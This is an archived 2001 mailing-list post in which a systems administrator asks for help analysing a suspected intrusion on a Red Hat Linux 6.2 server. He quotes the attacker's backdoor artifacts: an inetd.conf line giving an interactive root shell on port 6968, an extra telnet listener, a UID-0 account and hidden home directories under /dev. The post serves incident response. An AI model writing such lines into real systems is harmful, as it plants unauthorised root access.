Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

Possible Intrusion?

From: Kip Perkins <kip () tennesseeanytime org>
Date: Tue, 12 Jun 2001 11:39:16 -0500
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Good morning all. I was wonder if I could get some help on a possible
intrusion analysis. Recently I discovered some interesting things on a RH
Linux 6.2 box.

in /dev:
/dev/.w
/dev/.c
/dev/.cmd

in /etc/inetd.conf:
6968 stream tcp nowait root /bin/sh sh -i
2121 stream tcp nowait root /usr/sbin/tcpd in/telnetd

in /etc/passwd:
cmd:x:0:500::/dev/.cmd:/dev/null
command:x:500:501::/dev/.c:/dev/null
wizards:x:501:502::/dev/.w:/dev/null

This is all I can find that is wierd (translate- "I don't recognize").
Dones anyone recognize these entries? Is this a possible rootkit?
The /dev/ homes and cmd UID of 0 give me that impression.
Any help would be greatly appreciated :-)

- - --
Kip Perkins
Systems Administrator
NIC - TennesseeAnytime.org
office 615.313.0312

Live as you want your children to
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE7JkW0L1ei/5O2f1gRAqlYAJ9KgrX+CgH3W8j1TSpHyVOxoBLvaQCfe0oE
sc3PMPQLxUZU0qFueODNqb0=
=vqf9
-----END PGP SIGNATURE-----
Previous By Date Next
Previous By Thread Next

Current thread: